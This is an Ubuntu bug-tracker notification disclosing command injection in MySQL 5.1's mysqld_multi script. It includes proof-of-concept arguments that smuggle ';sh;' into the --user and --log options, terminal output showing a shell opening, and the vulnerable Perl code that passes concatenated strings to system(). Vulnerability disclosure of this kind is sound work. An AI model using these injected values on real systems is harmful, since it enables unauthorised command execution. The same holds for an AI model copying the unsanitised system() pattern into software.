Public bug reported: Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi have command injection bugs . test case : emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example 1 ) report option : emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011 Reporting MySQL servers /usr/bin/mysqladmin: connect to server at 'localhost' failed error: 'Access denied for user 'User'@'localhost' (using password: NO)' $ 2 ) start option : emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start SystemInj $ 3 ) stop option emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011 Stopping MySQL servers /usr/bin/mysqladmin: connect to server at 'localhost' failed error: 'Access denied for user 'User'@'localhost' (using password: NO)' $ the bug can be found at : 1 ) sub report_mysqlds $com= get_mysqladmin_options($i, @groups); $com.= " ping >> /dev/null 2>&1"; system($com); 2 ) sub start_mysqlds() $com.= $tmp; $com.= " >> $opt_log 2>&1" if (!$opt_no_log); $com.= " &"; system($com); 3 ) sub stop_mysqlds() $com= get_mysqladmin_options($i, @groups); $com.= " shutdown"; $com.= " >> $opt_log 2>&1" if (!$opt_no_log); $com.= " &"; system($com); ** Affects: mysql-5.1 (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Server Team, which is subscribed to mysql-5.1 in Ubuntu. https://bugs.launchpad.net/bugs/782298 Title: command injections in mysqld_multi -- Ubuntu-server-bugs mailing list Ubuntu-server-bugs@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-server-bugs